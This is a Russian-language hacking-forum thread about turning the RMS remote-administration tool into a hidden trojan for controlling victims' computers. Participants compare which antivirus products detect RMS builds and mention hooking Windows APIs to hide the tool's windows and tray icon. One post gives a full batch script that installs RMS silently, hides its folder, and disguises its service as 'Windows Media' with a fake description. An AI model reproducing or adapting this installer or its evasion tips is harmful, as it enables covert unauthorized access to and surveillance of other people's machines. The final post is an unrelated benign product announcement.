RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. labvictx
    labvictx Новичок
    Симпатии:
    0
    1. Скажите плиз я правильно понимаю что она написана на Delphi?

2. Сам принцем действия программы (встроенные функции винды или свои функции изложенные в серверной части ПО) и поддерживания через инет используя IP, то как клиент находит сервер (все таки у мнг. пользователей IP-Динамический т.е. не постоянный, а значит поиск по IP в большем % не подходит)?

3. Как при конектившись к удаленному хосту посмотреть IP-хоста, RMS версии 5.5.3.??

4. Какую лучше использовать версию RMS чтоб не визжали антивирусники?

6 ноя 2013
  2. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    ПРЕЖДЕ ЧЕМ ЗАДАВАТЬ ВОПРОСЫ МОЖНО СНАЧАЛА ПОЧИТАТЬ О ОФИЦЕАЛЬНОМ rms http://rmansys.ru/

6 ноя 2013
    1 человеку нравится это.
  3. labvictx
    labvictx Новичок
    Симпатии:
    0
    я не нашел там ответов на 1,4 вопрос, по этому тут спрашиваю у знающих людей ;)

8 ноя 2013
  4. deity
    deity Новичок
    Симпатии:
    7
    1) вряд ли там только делфи на клиенте и сервере, скорее, какое-нибудь, комбинированное решение
    4) 5.5, наверное, наиболее стойкая. порекомендую попробовать 5.3.1b2. "визжат" все, нод32, авира или аваст (не помню точно) вообще буйные, сразу отправляют в карантин, несмотря на легитимные сигнатуры и цифровые подписи исполняемых файлов. криптануть и не поломать сервер из 2 исполняемых файлов не получится, более того, в данном случае, это верх идиотизма. поэтому жертв с нодами, авирами/авастами троянить не советую, или убеждать их отключать антивирус при исполнении файла. касперский со стандартной конфигурацией на запуск не реагирует. выложу скан сигнатур, хотя "not-a-virus:..." или "Suspicious file" толком ничего не значит
    https://www.metascan-online.com/en/scanresult/file/8464c63569614e318171924ab744c80f

13 ноя 2013
  5. nebra
    nebra Новичок
    Симпатии:
    13
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**

Последнее редактирование модератором: 16 ноя 2013
    16 ноя 2013
  6. Rmist
    Rmist Новичок
    Симпатии:
    1
    Дожились - скоро за регистрацию труд научный будут посить... Все только для "своих". И если тебе интересна 1 тема и ты в ней только начинаешь разбираться - это никого не интересует - набирай + и получи доступ. А как, ув. админы, мне набить рейтинг если я только начинаю разбираться? Искать на стороне информацию? Так зачем мне тогда ваш форум? Я СЮДА учиться пришел - но тут капитализм наступил...

17 ноя 2013
  7. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Rmist, что-то я не наблюдаю хайдов в первом посте. Читай, смотри картинки, пробуй.
    Ты же пришёл учиться, а не качать из-под хайдов готовое. Не так ли? ;)

18 ноя 2013
  8. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    То то и оно, что все сюда пришли как и ты в первый раз и никто не ныл по поводу хайдов, а их делают от школоло которые труд людей сливают в помойку(вирус тотал и подобное)! Пиши и люди тебе помогут чем смогут, а требовать мол вынь да полож здесь не приветствуется!

18 ноя 2013
  9. Rmist
    Rmist Новичок
    Симпатии:
    1
    Да понятно всё. На счет сливальщиков поддержу - жаль что из-за таких умников страдают все.
    Первый пост интересен и опробован, но с тех пор прога очень изменилась да и вопрос антипалевности новинок интересует, а по личкам стучать и отвлекать не люблю - хочется самому вникнуть, что и зачем.
    Будем есть, то что есть. Спасибо и за весь тот материал, что тут предоставлен.

19 ноя 2013
  10. GeForse
    GeForse Новичок
    Симпатии:
    4
    Mr.Burns, в очередной раз уже просим описать или дать ссылки на мануал или подобное по созданию dll для рмс, т.к. версии все новые и новые, и для каждой своя.
    Благодарю

19 ноя 2013
  11. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Перехват CreateWindowExW, MessageBoxW, WTSSendMessageW и Shell_NotifyIconW на всякий случай.
    Всё.
    Мануалов по перехвату апи не писал только ленивый.

19 ноя 2013
    1 человеку нравится это.
  12. MaddyGod
    MaddyGod Новичок
    Симпатии:
    0
    Народ, привет. Перечитал форум и уже мозг пухнет, не могу решить одну проблему, которая была еще с 5.1 версией. Создаю скрытую установку в 1 клик версии 5.5 со всеми делами типа не показывания баннера и т.п. Все работает отлично до тех пор, пока жертва не запустит установку еще раз. После этого не подключается и все тут. Что нужно сделать и как, что бы в момент установки сборки, проверялось ее наличие на компе и если она там есть, то либо установка отменялась, либо переустанавливалась заново с новым ID. Заранее спасибо!

19 ноя 2013
  13. scalpel
    scalpel Новичок
    Симпатии:
    4
    Все есть в гугле.Что так трудно ввести поисковый запрос типа такого:
    "проверка запущенного процесса через bat файл"
    "проверка наличия файла через bat"

20 ноя 2013
  14. MaddyGod
    MaddyGod Новичок
    Симпатии:
    0
    Веришь, нет, все облазил, но либо я чего-то не догоняю, либо не везет мне с результатами поиска.
    Если уж можешь помочь - помоги.

20 ноя 2013
  15. zag78
    zag78 Новичок
    Симпатии:
    0
    ребята всем привет, подскажите, не знаю как сделать, только сильно не пинайте, из тела сообщение об отправке вызывается 2 раза, все определил, а вот куда поставить значение не могу

20 ноя 2013
  16. GeForse
    GeForse Новичок
    Симпатии:
    4
    Код:
    @if not exist %ProgramFiles%\Remote Manipulator System - Host\rutserv.exe (goto inst) else (goto exit)
    Такое вот условие в батнике, поясняю, если он находит файл в прописанной директории то идет по метке exit в которой идет запуск процесса навсякий)
    если же нет этого файла то идет по метке inst в которой идет уже непосредственно установка РМС
    Вот еще для каждой метки если нужно:
    Код:
    :exit
    @"%ProgramFiles%\Remote Manipulator System - Host\rutserv.exe" /silentinstall
    @"%ProgramFiles%\Remote Manipulator System - Host\rutserv.exe" /firewall
    @"%ProgramFiles%\Remote Manipulator System - Host\rutserv.exe" /start
    @ping 127.0.0.1
    @sc config "RManService" start= auto displayname= "Windows Media"
    @sc description "RManService" "Authorization and authentication for signed Windows Media files"
    Код:
    :inst
    @taskkill /f /im rutserv.exe
    @reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    @MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn REBOOT=ReallySuppress
    @MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress
    @msiexec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress 
    @msiexec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress
    @msiexec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress
    @MsiExec /x {B04BFE4C-7F11-49D8-ADFE-867939D886FA} /qn REBOOT=ReallySuppress
    @MsiExec /x {2B0A2EED-E2C8-40CE-A701-95B211A39B34} /qn REBOOT=ReallySuppress
    @MsiExec /x {11A90858-40BB-4858-A2DA-CA6495B5E907} /qn REBOOT=ReallySuppress
    @MsiExec /x {CD64A32F-8B05-4913-B988-BA68265083B9} /qn REBOOT=ReallySuppress

@ping 127.0.0.1
    @MsiExec /I "rmsi.msi" /qn
    @attrib +s +h "%ProgramFiles%\Remote Manipulator System - Host"
    @regedit /s 123.reg
    @ping 127.0.0.1
    @sc config "RManService" start= auto displayname= "Windows Media"
    @sc description "RManService" "Authorization and authentication for signed Windows Media files"
    @goto end
    Ну это как шаблон, там свое еще кучу добавишь/уберешь

21 ноя 2013
    1 человеку нравится это.
  17. MaddyGod
    MaddyGod Новичок
    Симпатии:
    0
    Воооо..... Дело!!! Спасибо ДжиФорс, выручил!!!

Добавлено через 21 минуту
    Кстати, народ, а кто-нибудь тестил сборку 5.5 с Dr.Web?
    Он орет что-нить или вообще молчок?

Последнее редактирование: 21 ноя 2013
    21 ноя 2013
  18. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Доктор Веб молчит если только фаер не включен в комплекте

21 ноя 2013
  19. MaddyGod
    MaddyGod Новичок
    Симпатии:
    0
    Аха, спасибо... А то там, куда надо закинуть сборку, как раз Веб установлен.

21 ноя 2013
  20. andersen62
    andersen62 Новичок
    Симпатии:
    7
    Рады сообщить вам о выпуске долгожданной мобильной версии Клиента RMS. Для тестирования, на данный момент, доступно только приложение под Android для устройств на базе ARM процессоров. После окончания данного тестирования будет выпущена также версия для устройств Apple работающих под управлением iOS. Текущая версия мобильного клиента весьма проста, однако вполне позволяет осуществлять удаленное управление мышью и клавиатурой, как в локальной сети, так и через Internet-ID. В следующем 2014 году, примерно весной, планируется выпуск мобильного клиента для Android x86 устройств, а также Windows Phone.

Для работы мобильной версии необходимо обновить также и удаленный Хост, работать со старыми Хостами, увы, не получится. Стандартные Хост и Клиент получили ряд внутренних доработок, исправлено несколько проблем.

Начинаем тестирование )))

23 ноя 2013
Статус темы:
Закрыта.
Загрузка...